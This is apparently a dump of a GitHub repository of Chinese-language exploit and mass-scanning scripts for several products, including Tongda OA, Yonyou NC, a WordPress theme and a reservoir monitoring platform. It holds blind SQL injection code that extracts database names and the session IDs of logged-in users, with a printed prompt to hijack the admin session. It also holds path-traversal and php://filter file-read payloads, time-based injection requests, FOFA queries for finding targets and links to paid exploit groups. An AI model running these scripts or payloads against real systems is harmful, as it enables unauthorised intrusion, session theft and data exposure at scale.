https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231224通达三个漏洞/assets/image-20231224114053918.png -------------------------------------------------------------------------------- /20231224通达三个漏洞/exp2.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3,sys 2 | from hashlib import md5 3 | import binascii 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | l=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','_','-','(',')'] 6 | def Hex_encoding(string): 7 | Hex=binascii.b2a_hex(string.encode()) 8 | return "0x"+Hex.decode() 9 | def exp(baseurl): 10 | if baseurl[-1]=='/': 11 | baseurl=baseurl 12 | else: 13 | baseurl=baseurl+"/" 14 | url=baseurl+'general/file_folder/swfupload_new.php' 15 | headers = { 16 | 'Content-Type': 'multipart/form-data; boundary=----------GFioQpMK0vv2', 17 | 'Accept-Encoding': 'gzip' 18 | } 19 | result='' 20 | for i in range(1,10): 21 | for j in l: 22 | ej=Hex_encoding(j) 23 | data=f'''------------GFioQpMK0vv2\r 24 | Content-Disposition: form-data; name="ATTACHMENT_ID"\r 25 | \r 26 | 1\r 27 | ------------GFioQpMK0vv2\r 28 | Content-Disposition: form-data; name="ATTACHMENT_NAME"\r 29 | \r 30 | 1\r 31 | ------------GFioQpMK0vv2\r 32 | Content-Disposition: form-data; name="FILE_SORT"\r 33 | \r 34 | 2\r 35 | ------------GFioQpMK0vv2\r 36 | Content-Disposition: form-data; name="SORT_ID"\r 37 | \r 38 | 0 RLIKE (SELECT (CASE WHEN (substr(database(),{i},1)={ej}) THEN 1 ELSE 0x28 END))\r 39 | ------------GFioQpMK0vv2--''' 40 | # print(data) 41 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5) 42 | if '"status":1' in response.text: 43 | result+=j 44 | print(result) 45 | break 46 | # def 
session(baseurl): 47 | # if baseurl[-1]=='/': 48 | # baseurl=baseurl 49 | # else: 50 | # baseurl=baseurl+"/" 51 | # url=baseurl+'general/file_folder/swfupload_new.php' 52 | # headers = { 53 | # 'Content-Type': 'multipart/form-data; boundary=----------GFioQpMK0vv2', 54 | # 'Accept-Encoding': 'gzip' 55 | # } 56 | # result='' 57 | # for i in range(1,10): 58 | # for j in l: 59 | # ej=Hex_encoding(j) 60 | # data=f'''------------GFioQpMK0vv2\r 61 | # Content-Disposition: form-data; name="ATTACHMENT_ID"\r 62 | # \r 63 | # 1\r 64 | # ------------GFioQpMK0vv2\r 65 | # Content-Disposition: form-data; name="ATTACHMENT_NAME"\r 66 | # \r 67 | # 1\r 68 | # ------------GFioQpMK0vv2\r 69 | # Content-Disposition: form-data; name="FILE_SORT"\r 70 | # \r 71 | # 2\r 72 | # ------------GFioQpMK0vv2\r 73 | # Content-Disposition: form-data; name="SORT_ID"\r 74 | # \r 75 | # 0 RLIKE (SELECT (CASE WHEN (substr((select SID from user_online limit 0,1),{i},1)={ej}) THEN 1 ELSE 0x28 END))\r 76 | # ------------GFioQpMK0vv2--''' 77 | # print(i) 78 | # response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5) 79 | # if '"status":1' in response.text: 80 | # result+=j 81 | # print(result) 82 | # break 83 | if __name__ == '__main__': 84 | url=sys.argv[1] 85 | exp(url) -------------------------------------------------------------------------------- /20231224通达三个漏洞/exp3.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3,sys 2 | from hashlib import md5 3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 4 | def dbname(baseurl): 5 | if baseurl[-1]=='/': 6 | baseurl=baseurl 7 | else: 8 | baseurl=baseurl+"/" 9 | url=baseurl+'general/document/index.php/recv/register/insert' 10 | headers = { 11 | 'Content-Type': 'application/x-www-form-urlencoded' 12 | } 13 | start=0 14 | end=126 15 | dbname='' 16 | flag=[] 17 | for i in range(1,27): 18 | start=0 19 | end=126 20 | if len(flag)>0: 21 | break 22 | 
while True: 23 | print(i,start,end) 24 | mid=int((start+end)/2) 25 | if start+1==end: 26 | if start!=0 and end !=1: 27 | dbname+=chr(end) 28 | print(dbname) 29 | break 30 | else: 31 | flag.append(1) 32 | break 33 | data=f'title)values("\'"^exp(if(ascii(substr((select/**/database()),{i},1))>{mid},1,710)))# =1&_SERVER=' 34 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5,allow_redirects=False) 35 | if response.status_code==302: 36 | start=mid 37 | else: 38 | end=mid 39 | 40 | print(f"当前数据库名:{dbname}") 41 | def session(baseurl): 42 | if baseurl[-1]=='/': 43 | baseurl=baseurl 44 | else: 45 | baseurl=baseurl+"/" 46 | url=baseurl+'general/document/index.php/recv/register/insert' 47 | headers = { 48 | 'Content-Type': 'application/x-www-form-urlencoded' 49 | } 50 | start=0 51 | end=126 52 | PHPSESSID='' 53 | flag=[] 54 | for i in range(25,27): 55 | start=0 56 | end=126 57 | if len(flag)>0: 58 | break 59 | while True: 60 | print(i,start,end) 61 | mid=int((start+end)/2) 62 | if start+1==end: 63 | if start!=0 and end !=1: 64 | PHPSESSID+=chr(end) 65 | print(PHPSESSID) 66 | break 67 | else: 68 | flag.append(1) 69 | break 70 | data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/where/**/uid/**/like/**/1/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 71 | # data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/where/**/uid<2/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 72 | # data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 73 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5,allow_redirects=False) 74 | if response.status_code==302: 75 | start=mid 76 | else: 77 | end=mid 78 | 79 | print(f"使用PHPSESSID={PHPSESSID}访问{baseurl}general/index.php登入后台") 80 | # break 81 | if __name__ == '__main__': 82 | url=sys.argv[1] 83 | # session(url) 84 | dbname(url) 
85 | 86 | -------------------------------------------------------------------------------- /20231224通达三个漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from hashlib import md5 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | from urllib import parse 8 | from rich.console import Console 9 | import argparse 10 | import re 11 | import base64 12 | import multiprocessing 13 | from multiprocessing.dummy import Pool 14 | import concurrent.futures 15 | import json 16 | import warnings 17 | import random 18 | warnings.filterwarnings("ignore") 19 | 20 | 21 | def banner(): 22 | test = """ 23 | 24 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 25 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 26 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 27 | "8aa8" 88 88,d88' 88 88 `8b 88 88 28 | `88' 88 8888"88, 88 88 `8b 88 88 88888 29 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 30 | 88 88 88 "88, 88 88 `8888 Y8a. 
.a88 31 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 32 | 33 | 888888888888 34 | 35 | tag: this is a 通达-FLOW_ID SQL注入漏洞 poc 36 | @version: 1.0.0 @author: Y1_K1NG 37 | """ 38 | print(test) 39 | def randomInt(s,e): 40 | key=random.randint(int(s),int(e)) 41 | return key 42 | 43 | def poc(target): 44 | randstr = randomInt(1000000, 9999999) 45 | url = target + f"/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),md5({randstr}),1,1)a%20from%20information_schema.tables%20group%20by%20a)b)%23" 46 | 47 | try: 48 | response = requests.get(url, timeout=8, verify=False) 49 | if md5(str(randstr).encode()).hexdigest() in response.text: 50 | print(f"[+]{target} is valuable") 51 | with open("result.txt", "a+", encoding="utf-8") as f: 52 | f.write(target + "\n") 53 | else: 54 | print(f"[-]{target} is not valuable") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(?:https?://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | host, port = match.groups() 66 | if not port: 67 | if "https" in url: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | def main(): 76 | banner() 77 | parser = argparse.ArgumentParser(description='canal admin weak Password') 78 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 79 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 80 | args = parser.parse_args() 81 | if args.url and not args.file: 82 | host, port = extract_host(args.url) 83 | if host: 84 | if "https" in args.url: 85 | url = f"https://{host}:{port}" 86 | else: 87 | url = f"http://{host}:{port}" 88 | poc(url) 89 | else: 90 | print(f"Invalid URL: {args.url}") 91 | elif not args.url and args.file: 92 | url_list = [] 93 | with open(args.file, "r", 
encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | host, port = extract_host(url) 97 | if host: 98 | if "https" in url: 99 | url_list.append(f"https://{host}:{port}") 100 | else: 101 | url_list.append(f"http://{host}:{port}") 102 | else: 103 | print(f"Invalid URL: {url}") 104 | 105 | mp = Pool(10) # 创建一个拥有20个线程的线程池 106 | mp.map(poc, url_list) 107 | mp.close() 108 | mp.join() 109 | else: 110 | print(f"Usage:\n\t python3 {sys.argv[0]} -h") 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20231224通达三个漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # FLOW_ID SQL注入,swfupload_new.php文件上传,title参数 SQL注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | fofa:title="EasyCVR" 8 | 9 | app="TDXK-通达OA" 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | 16 | 17 | python poc.py -f .txt 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | exp已经发布在圈子 26 | 27 | https://pc.fenchuan8.com/#/index?forum=36894&yqm=M1R3 28 | 29 | 私聊圈主39r直接进圈 30 | 31 | ![image-20231224114053918](assets/image-20231224114053918.png) 32 | 33 | python exp.py http:// 34 | 35 | ![image-20231224113959549](assets/image-20231224113959549.png) 36 | 37 | -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211647123.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211647123.png -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211841367.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211841367.png -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友 NC mxservlet 反序列化漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | fofa:app="用友-UFIDA-NC" 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 批量poc(记得安装库) 16 | 17 | python poc.py -u 18 | 19 | 20 | 21 | python poc.py -f .txt 22 | 23 | ![image-20231225211647123](assets/image-20231225211647123.png) 24 | 25 | exp可进圈获取 26 | 27 | 现在有优惠哦 28 | 29 | https://pc.fenchuan8.com/#/index?forum=62709&yqm=M1R3 30 | 31 | 32 | 33 | ![image-20231225211841367](assets/image-20231225211841367.png) 34 | 35 | -------------------------------------------------------------------------------- /20231226某运维堡垒机存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from hashlib import md5 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | from urllib import parse 8 | from rich.console import Console 9 | import argparse 10 | import re 11 | import base64 12 | import multiprocessing 13 | from multiprocessing.dummy import Pool 14 | import concurrent.futures 15 | import json 16 | import warnings 17 | import random 18 | warnings.filterwarnings("ignore") 19 | 20 | 21 | def banner(): 22 | test = """ 23 | 24 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 25 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 26 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 27 | "8aa8" 88 88,d88' 88 88 `8b 88 88 28 | `88' 88 8888"88, 88 88 `8b 88 88 88888 29 | 88 88 88P 
Y8b 88 88 `8b 88 Y8, 88 30 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 31 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 32 | 33 | 888888888888 34 | 35 | tag: this is a 某运维堡垒机存在任意文件读取漏洞 poc 36 | @version: 1.0.0 @author: Y1_K1NG 37 | """ 38 | print(test) 39 | def poc(target): 40 | if target[-1] == '/': 41 | target = target 42 | else: 43 | target = target + "/" 44 | url = target + 'bhost/GetCaCert?a1=../../../../../etc/hosts' 45 | headers = { 46 | 'User-Agent': 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 47 | } 48 | 49 | try: 50 | response = requests.get(url,headers=headers,verify=False,timeout=15) 51 | if 'y1k1ng' in response.text and 'echo' not in response.text: 52 | print(f"[+]{target} is valuable") 53 | with open("result.txt", "a+", encoding="utf-8") as f: 54 | f.write(target + "\n") 55 | else: 56 | print(f"[-]{target} is not valuable") 57 | except Exception as e: 58 | print(f"[*] {target} error: {str(e)}") 59 | 60 | 61 | def extract_host(url): 62 | """ 63 | 从 URL 中提取主机地址和端口号,返回 (host, port) 64 | """ 65 | match = re.search(r"(?:https?://)?([\w\.]+):?(\d+)?", url) 66 | if match: 67 | host, port = match.groups() 68 | if not port: 69 | if "https" in url: 70 | port = "443" 71 | else: 72 | port = "80" 73 | return host, int(port) 74 | else: 75 | return None, None 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | if args.url and not args.file: 84 | host, port = extract_host(args.url) 85 | if host: 86 | if "https" in args.url: 87 | url = f"https://{host}:{port}" 88 | else: 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | else: 92 | print(f"Invalid URL: {args.url}") 93 | elif not args.url and args.file: 94 | url_list = [] 95 | with 
open(args.file, "r", encoding="utf-8") as f: 96 | for url in f.readlines(): 97 | url = url.strip().replace("\n", "") 98 | host, port = extract_host(url) 99 | if host: 100 | if "https" in url: 101 | url_list.append(f"https://{host}:{port}") 102 | else: 103 | url_list.append(f"http://{host}:{port}") 104 | else: 105 | print(f"Invalid URL: {url}") 106 | 107 | mp = Pool(10) # 创建一个拥有20个线程的线程池 108 | mp.map(poc, url_list) 109 | mp.close() 110 | mp.join() 111 | else: 112 | print(f"Usage:\n\t python3 {sys.argv[0]} -h") 113 | 114 | 115 | if __name__ == '__main__': 116 | main() 117 | -------------------------------------------------------------------------------- /20231226某运维堡垒机存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | 某运维堡垒机存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:banner="Set-Cookie: bhost=" || header="Set-Cookie: bhost=" 6 | 7 | 8 | 9 | GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1 10 | Host: 127.0.0.1 11 | 12 | 13 | 14 | 直接GET请求即可 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | python poc.py -f .txt 23 | 24 | -------------------------------------------------------------------------------- /20231227wordpress_admin-ajax.php文件包含漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # wordpress admin-ajax.php文件包含漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa语法 6 | 7 | body="wp-content/themes/motor"" 8 | 9 | POC: 10 | 11 | ``` 12 | POST /wp-admin/admin-ajax.php HTTP/1.1 13 | Host: 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 15 | Content-Type: multipart/form-data;boundary=--------1699260943 16 | Content-Length: 250 17 | 18 | ----------1699260943Content-Disposition: form-data; name="action"motor_load_more----------1699260943 19 | Content-Disposition: form-data;name="file" 20 | 21 | php://filter/resource=/etc/passwd#这里整不整编码看你,text找匹配内容 22 | ----------1699260943-- 23 | ``` 24 | 25 | 26 | 27 | 28 | 29 | 批量poc(记得安装库) 30 | 31 | python poc.py -u 32 | 33 | 34 | 35 | python poc.py -f .txt 36 | 37 | -------------------------------------------------------------------------------- /20231228某电子水库安全监管平台sql注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某电子水库安全监管平台sql注入漏洞 poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + 'WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId' 39 | 40 | 41 | headers = { 42 | "Content-Type": 
"application/x-www-form-urlencoded", 43 | "User-Agent": "Mozilla/5.0", 44 | "Accept-Language": "zh-CN,zh;q=0.9", 45 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 46 | "Accept-Encoding": "gzip, deflate", 47 | "Cookie": "currentuser=username=admin; usercookiename=usernames=admin;", 48 | "Content-Length": "128" 49 | 50 | } 51 | data = '''loginIdentifer=123&simcardId=123';WAITFOR DELAY '0:0:3'--''' 52 | 53 | try: 54 | response = requests.post(url, headers=headers, verify=False, timeout=15, data=data) 55 | # print(response.request.body) 56 | # print(response.content) 57 | if response.status_code == 200 and response.elapsed.total_seconds() > 2: 58 | print(f"[+] {target} 存在 sql ") 59 | else: 60 | print(f"[-] {target} 未发现 sql") 61 | except Exception as e: 62 | print(f"[*] {target} error: {str(e)}") 63 | 64 | 65 | def extract_host(url): 66 | """ 67 | 从 URL 中提取主机地址和端口号,返回 (host, port) 68 | """ 69 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 70 | if match: 71 | prefix, host, port = match.groups() 72 | if not port: 73 | if prefix and "https" in prefix: 74 | port = "443" 75 | else: 76 | port = "80" 77 | return host, int(port) 78 | else: 79 | return None, None 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='canal admin weak Password') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | 89 | if args.url and not args.file: 90 | if "https://" in args.url or "http://" in args.url: 91 | url = args.url 92 | else: 93 | host, port = extract_host(args.url) 94 | url = f"http://{host}:{port}" 95 | poc(url) 96 | 97 | elif args.url is None and args.file is not None: 98 | url_list = [] 99 | with open(args.file, "r", encoding="utf-8") as f: 100 | for url in 
f.readlines(): 101 | url = url.strip().replace("\n", "") 102 | if "https://" in url or "http://" in url: 103 | url = url 104 | else: 105 | host, port = extract_host(url) 106 | url = f"http://{host}:{port}" 107 | url_list.append(url) 108 | 109 | pool = Pool(10) 110 | pool.map(poc, url_list) 111 | pool.close() 112 | pool.join() 113 | 114 | else: 115 | parser.print_help() 116 | 117 | 118 | if __name__ == '__main__': 119 | main() 120 | -------------------------------------------------------------------------------- /20231228某电子水库安全监管平台sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 某电子水库安全监管平台-存在sql注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | js_name="js/PSExtend.js" 8 | 9 | POC: 10 | 11 | POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1 12 | Host: 13 | "Accept-Language": "zh-CN,zh;q=0.9" 14 | Content-Type: application/x-www-form-urlencoded 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 17 | Accept-Encoding: gzip, deflate 18 | Cookie: currentuser=username=admin; usercookiename=usernames=admin; 19 | Content-Length: 128 20 | 21 | loginIdentifer=123&simcardId=123';WAITFOR DELAY '0:0:3'-- 22 | 23 | 24 | 25 | 直接GET请求即可 26 | 27 | ![image-20231219105512392](assets/image-20231219105512392.png) 28 | 29 | 批量poc(记得安装库) 30 | 31 | python poc.py -u 32 | 33 | ![image-20231219105617309](assets/image-20231219105617309.png) 34 | 35 | python poc.py -f .txt 36 | 37 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231229用友NC Cloud soapFormat接口XXE漏洞/poc.md: 
-------------------------------------------------------------------------------- 1 | # 用友NC Cloud soapFormat接口XXE漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/" 8 | 9 | 记得装库 10 | 11 | python poc.py -u 12 | 13 | ![image-20231219105617309](assets/image-20231219105617309.png) 14 | 15 | python poc.py -f .txt 16 | 17 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231230金和-c6 gethomeinfo sql注入/poc.md: -------------------------------------------------------------------------------- 1 | # 金和-c6 gethomeinfo sql注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 金和-c6 gethomeinfo sql注入 6 | 7 | 指纹 body="JHSoft.Web.AddMenu" 8 | 9 | GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:3%27-- 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20231230金和-c6 gethomeinfo sql注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 
88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a jinher-c6-HomeService-sqli poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + '''c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:3%27--''' 39 | 40 | 41 | headers = { 42 | "Connection": "close", 43 | "User-Agent": "Mozilla/5.0" 44 | 45 | } 46 | 47 | try: 48 | response = requests.get(url, headers=headers, verify=False, timeout=15) 49 | # print(response.request.body) 50 | # print(response.content) 51 | if response.elapsed.total_seconds() > 2: 52 | print(f"[+] {target} 存在 sql ") 53 | else: 54 | print(f"[-] {target} 未发现 sql") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | prefix, host, port = match.groups() 66 | if not port: 67 | if prefix and "https" in prefix: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | 76 | def main(): 77 | banner() 78 | parser = argparse.ArgumentParser(description='canal admin weak Password') 79 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 80 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 81 | args = parser.parse_args() 82 | 83 | if args.url and not args.file: 84 | if "https://" in args.url or "http://" in args.url: 85 | url = args.url 86 | else: 87 | host, port = extract_host(args.url) 88 | url = f"http://{host}:{port}" 89 | poc(url) 90 | 91 | elif args.url is None and args.file is not None: 92 | url_list = [] 93 | with open(args.file, 
"r", encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | if "https://" in url or "http://" in url: 97 | url = url 98 | else: 99 | host, port = extract_host(url) 100 | url = f"http://{host}:{port}" 101 | url_list.append(url) 102 | 103 | pool = Pool(10) 104 | pool.map(poc, url_list) 105 | pool.close() 106 | pool.join() 107 | 108 | else: 109 | parser.print_help() 110 | 111 | 112 | if __name__ == '__main__': 113 | main() 114 | -------------------------------------------------------------------------------- /20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某神SecGate3600 authManageSet.cgi信息泄露漏洞 poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "cgi-bin/authUser/authManageSet.cgi" 39 | 40 | 41 | headers = { 42 | "Connection": "close", 43 | "User-Agent": "Mozilla/5.0", 44 | "Accept": "*/*", 45 | "Accept-Encoding": "gzip, deflate", 46 | "Accept-Language": 